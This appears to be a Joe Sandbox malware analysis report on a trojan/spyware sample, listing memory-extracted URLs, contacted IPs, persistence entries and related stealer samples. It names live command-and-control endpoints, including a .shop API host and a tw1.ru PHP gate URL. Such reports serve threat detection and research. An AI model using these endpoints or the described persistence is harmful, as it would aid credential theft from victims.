https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/?q=	Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	Loader.exe.0.dr	false	URL Reputation: safe	unknown
http://ocsp.entrust.net02	Loader.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa03	Loader.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	Loader.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001441B000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ipinfo.io	Bypass.exe, 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ck66916.tw1.ru	Bypass.exe, 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ck66916.tw1.ru/	Bypass.exe, 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://backcreammykiel.shop/B	RegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://backcreammykiel.shop:443/api	RegAsm.exe, 0000000D.00000002.1976836408.000000000390D000.00000004.00000800.00020000.00000000.sdmp	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://backcreammykiel.shop/s	RegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.entrust.net/ts1ca.crl0	Loader.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Bypass.exe, 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://backcreammykiel.shop/l	RegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13	Bypass.exe, 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	Loader.exe.0.dr	false	URL Reputation: safe	unknown
https://backcreammykiel.shop/	RegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.entrust.net/rpa0	Loader.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
104.21.90.18	backcreammykiel.shop	United States	13335	CLOUDFLARENETUS	true
92.53.96.121	ck66916.tw1.ru	Russian Federation	9123	TIMEWEB-ASRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1461211
Start date and time:	2024-06-23 06:53:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bFZYRLnRIz.exe renamed because original name is a hash value
Original Sample Name:	289f27e7a02f8e76ebf39d2c0c3f09e4.bin.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@30/247@3/3
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 67% Number of executed functions: 134 Number of non-executed functions: 115
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Bypass.exe, PID 7004 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:54:01	API Interceptor	17x Sleep call for process: powershell.exe modified
00:54:14	API Interceptor	7x Sleep call for process: RegAsm.exe modified
00:54:19	API Interceptor	13771009x Sleep call for process: Bypass.exe modified
05:54:22	Autostart	Run: WinLogon Shell C:\WINDOWS\system32\explorer.exe
05:54:31	Autostart	Run: WinLogon Shell C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.117.186.192	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	SecuriteInfo.com.Win32.Evo-gen.24318.16217.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	SecuriteInfo.com.Win32.Evo-gen.28489.31883.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	Raptor.HardwareService.Setup 1.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	w.sh	Get hash	malicious	Xmrig	Browse	/ip
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
104.21.90.18	GlobalCheats.exe	Get hash	malicious	LummaC, MicroClip	Browse
92.53.96.121	http://ct31152.tw1.ru/	Get hash	malicious	Unknown	Browse	ct31152.tw1.ru/data/logo.svg
	http://cb00287.tw1.ru/	Get hash	malicious	Unknown	Browse	cb00287.tw1.ru/data/logo.svg
	http://cv59800.tw1.ru/	Get hash	malicious	Unknown	Browse	cv59800.tw1.ru/data/logo.svg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
backcreammykiel.shop	GlobalCheats.exe	Get hash	malicious	LummaC, MicroClip	Browse	104.21.90.18
ipinfo.io	4h4b4EWVNU.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	34.117.186.192
	BqqQh4Jr7L.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	PsHQsuTG0H.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	plTAoSCew2.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	7rA1iX60wh.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	PsHQsuTG0H.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	PNO3otPYOa.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	YnsEArPlqx.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	http://dllavy.wixsite.com/mybt-view/	Get hash	malicious	Unknown	Browse	34.117.60.144
	4h4b4EWVNU.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	34.117.186.192
	BqqQh4Jr7L.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	https://peringatanfb772.wixsite.com/mysite	Get hash	malicious	Unknown	Browse	34.117.60.144
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	PsHQsuTG0H.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	plTAoSCew2.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	7rA1iX60wh.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	PsHQsuTG0H.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
TIMEWEB-ASRU	http://ct31152.tw1.ru/	Get hash	malicious	Unknown	Browse	92.53.96.121
	http://cb00287.tw1.ru/	Get hash	malicious	Unknown	Browse	92.53.96.121
	http://cv59800.tw1.ru/	Get hash	malicious	Unknown	Browse	92.53.96.121
	e64Gs23hN2.exe	Get hash	malicious	DCRat	Browse	92.53.96.121
	https://e-obmen24.com/	Get hash	malicious	Unknown	Browse	92.53.96.128
	R2KymBQ7YS.exe	Get hash	malicious	DCRat	Browse	92.53.96.121
	https://cs13786.tw1.ru/	Get hash	malicious	Unknown	Browse	92.53.96.121
	http://cf20871.tw1.ru/	Get hash	malicious	Unknown	Browse	185.114.247.232
	ebalcao_odqz.vbs	Get hash	malicious	Unknown	Browse	92.53.116.138
	COMMANDE.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	92.53.96.22
CLOUDFLARENETUS	SecuriteInfo.com.Trojan.InstallCore.4086.24549.19610.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	104.18.20.226
	SecuriteInfo.com.Trojan.InstallCore.4086.24549.19610.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	104.18.20.226
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	188.114.96.3
	YNsc5U2Qff.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	http://117.212.168.75:43380/Mozi.m	Get hash	malicious	Unknown	Browse	1.1.1.1
	SecuriteInfo.com.Win64.TrojanX-gen.14485.639.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	College of the Canyons Consent Files#304861(Revised).pdf	Get hash	malicious	HTMLPhisher	Browse	172.64.41.3
	SecuriteInfo.com.Win64.TrojanX-gen.14485.639.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://kliwue-bolanti-boowe.pages.dev/help/contact/60448578785126	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://didianeensing-fft-oshehun.pages.dev/help/contact/897378126380120	Get hash	malicious	Unknown	Browse	104.26.13.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Win64.TrojanX-gen.14485.639.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Win64.TrojanX-gen.14485.639.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	https://didianeensing-fft-oshehun.pages.dev/help/contact/897378126380120	Get hash	malicious	Unknown	Browse	34.117.186.192
	https://eugeniewun72-englichs302.pages.dev/help/contact/337110003119106	Get hash	malicious	Unknown	Browse	34.117.186.192
	https://sahilsendre.github.io/NETFLIX_CLONE_HTML_CSS_ONLY	Get hash	malicious	Unknown	Browse	34.117.186.192
	https://higorgoltara.github.io/dio-instagram/index	Get hash	malicious	Unknown	Browse	34.117.186.192
	https://amazon-us.kcloudx.workers.dev/ref=cs_503_link	Get hash	malicious	Unknown	Browse	34.117.186.192
	http://dllavy.wixsite.com/mybt-view/	Get hash	malicious	Unknown	Browse	34.117.186.192
	https://cakedrops.pages.dev/	Get hash	malicious	Unknown	Browse	34.117.186.192
	4h4b4EWVNU.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	34.117.186.192
a0e9f5d64349fb13191bc781f81f42e1	YNsc5U2Qff.exe	Get hash	malicious	LummaC	Browse	104.21.90.18
	BqqQh4Jr7L.exe	Get hash	malicious	RisePro Stealer	Browse	104.21.90.18
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.21.90.18
	omgsoft.exe	Get hash	malicious	LummaC	Browse	104.21.90.18
	Zahlung.docx.doc	Get hash	malicious	Unknown	Browse	104.21.90.18
	TS-240622-Lumma4.exe	Get hash	malicious	LummaC	Browse	104.21.90.18
